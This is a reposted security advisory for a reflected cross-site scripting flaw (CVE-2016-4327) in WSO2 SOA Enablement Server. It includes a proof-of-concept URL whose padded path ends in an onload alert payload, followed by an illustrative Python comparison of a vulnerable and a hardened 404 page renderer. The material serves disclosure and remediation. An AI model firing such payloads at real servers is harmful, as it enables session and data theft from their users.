WSO2 SOA Enablement Server - Reflected Cross-Site Scripting
May 17 2016 06:17PM
Etnies (kuba25101990 gmail com)
from SecurityFocus Vulnerabilities http://ift.tt/1TlLwXJ

Title: WSO2 SOA Enablement Server - Reflected Cross-Site Scripting
Authors: Jakub Palaczynski, Lukasz Juszczyk
Date: 08. April 2016
CVE: CVE-2016-4327
Affected Software:
==================
WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616
Probably other versions are also vulnerable.
Proof of Concept:
=================
PoC works only in IE browser - path is reflected in the response and
needs to be long enough to bypass IE's 404 page substitution:
https://host:6443/xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
g/onload=alert(document.domain)>
Patch:
======
Vendor has already released a patch for this issue.
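
The root cause described in the advisory is a request path written into the 404 response without output encoding. The following Python example is added here for illustration and is not WSO2's code or the advisory authors' code: it places a hypothetical 404 renderer that reflects the path verbatim beside a hardened one that HTML-encodes it. The template, the function names and the harmless `<i id=probe>` marker are assumptions constructed for this example.

```python
import html
from urllib.parse import unquote

# Constructed request path: long padding plus a harmless, percent-encoded markup probe.
SAMPLE_PATH = "/" + "xss" * 200 + "%3Ci%20id=probe%3E"

# Hypothetical error-page template; the real server's page layout is not on the page.
TEMPLATE = "<html><body><h1>404 Not Found</h1><p>No resource at {path}</p></body></html>"


def render_404_vulnerable(raw_path: str) -> str:
    """Reflect the decoded request path verbatim (the bug class in the advisory)."""
    return TEMPLATE.format(path=unquote(raw_path))


def render_404_hardened(raw_path: str) -> tuple[str, dict[str, str]]:
    """HTML-encode the reflected path and return defensive response headers."""
    safe = html.escape(unquote(raw_path), quote=True)
    headers = {
        # Explicit type and charset so the browser does not guess the encoding.
        "Content-Type": "text/html; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        # An error page needs no scripts, styles or subresources.
        "Content-Security-Policy": "default-src 'none'",
    }
    return TEMPLATE.format(path=safe), headers


def reflects_markup(body: str, probe: str = "<i id=probe>") -> bool:
    """Return True when the probe survives into the page as live markup."""
    return probe in body


if __name__ == "__main__":
    print("vulnerable reflects markup:", reflects_markup(render_404_vulnerable(SAMPLE_PATH)))
    hardened_body, hardened_headers = render_404_hardened(SAMPLE_PATH)
    print("hardened reflects markup:", reflects_markup(hardened_body))
    print("hardened headers:", hardened_headers)
```

The same `reflects_markup` check can be used as a regression test against a patched deployment's error pages, since the encoding has to hold for every path length.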